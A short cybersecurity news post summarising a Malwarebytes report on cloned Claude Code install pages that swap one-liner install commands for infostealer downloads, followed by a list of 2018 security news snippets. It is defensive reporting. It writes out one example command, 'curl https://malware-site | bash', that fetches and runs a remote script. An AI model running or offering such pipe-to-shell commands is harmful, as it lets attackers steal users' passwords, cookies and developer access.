Fake Claude Code install pages hit Windows and Mac users with infostealers


Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments.

Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator. Researchers found that attackers abuse this workflow by keeping everything identical, only changing where that one‑liner actually connects to.

Read more…
Source: Malwarebytes Labs  


Sign up for the Cyber Security Review Newsletter
The latest cyber security news and insights delivered right to your inbox


Related:

  • Two Zero-Day Exploits Found After Someone Uploaded ‘Unarmed’ PoC to VirusTotal

    July 2, 2018

    Security researchers at Microsoft have unveiled details of two critical and important zero-day vulnerabilities that had recently been discovered after someone uploaded a malicious PDF file to VirusTotal, and get patched before being used in the wild. In late March, researchers at ESET found a malicious PDF file on VirusTotal, which they shared with the security team ...

  • RAMpage Attack Explained – Exploiting RowHammer On Android Again!

    June 29, 2018

    A team of security researchers has discovered a new set of techniques that could allow hackers to bypass all kind of present mitigations put in place to prevent DMA-based Rowhammer attacks against Android devices. Dubbed RAMpage, the new technique (CVE-2018-9442) could re-enable an unprivileged Android app running on the victim’s device to take advantage from the previously ...

  • Researchers warn SCADA systems are still hopelessly insecure

    June 18, 2018

    BSides Industrial control systems could be exposed not just to remote hackers, but to local attacks and physical manipulation as well. A presentation at last week’s BSides conference by researchers from INSINIA explained how a device planted on a factory floor can identify and list networks, and trigger controllers to stop processes or production lines. Read more… Source: The ...

  • Chinese Hackers Carried Out Country-Level Watering Hole Attack

    June 14, 2018

    Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks. The campaign is believed to be active covertly since fall 2017 but was spotted in March by security researchers from Kaspersky Labs, who have attributed these attacks to a ...

  • Cyber security: Nation-state cyber attacks threaten everyone, warns ex-GCHQ boss

    June 8, 2018

    The dynamics of cyber warfare have changed so dramatically that nation-state attacks are now a problem everyone needs to face up to, the former head of the UK’s intelligence agency has warned. “Five years ago we were aware of nation-state attacks but we would’ve seen them as something that only a nation-state needs to worry about. Today they’re ...

  • Researchers Warn of Microsoft Zero-Day RCE Bug

    June 1, 2018

    Researchers have discovered a medium-severity Windows vulnerability that enables remote attackers to execute arbitrary code – and Microsoft hasn’t issued a patch yet. The flaw, which was first discovered by Dmitri Kaslov of Telspace Systems, exists within the handling of error objects in JScript, according to a Tuesday advisory by Trend Micro’s Zero Day Initiative group. Read more… Source: ...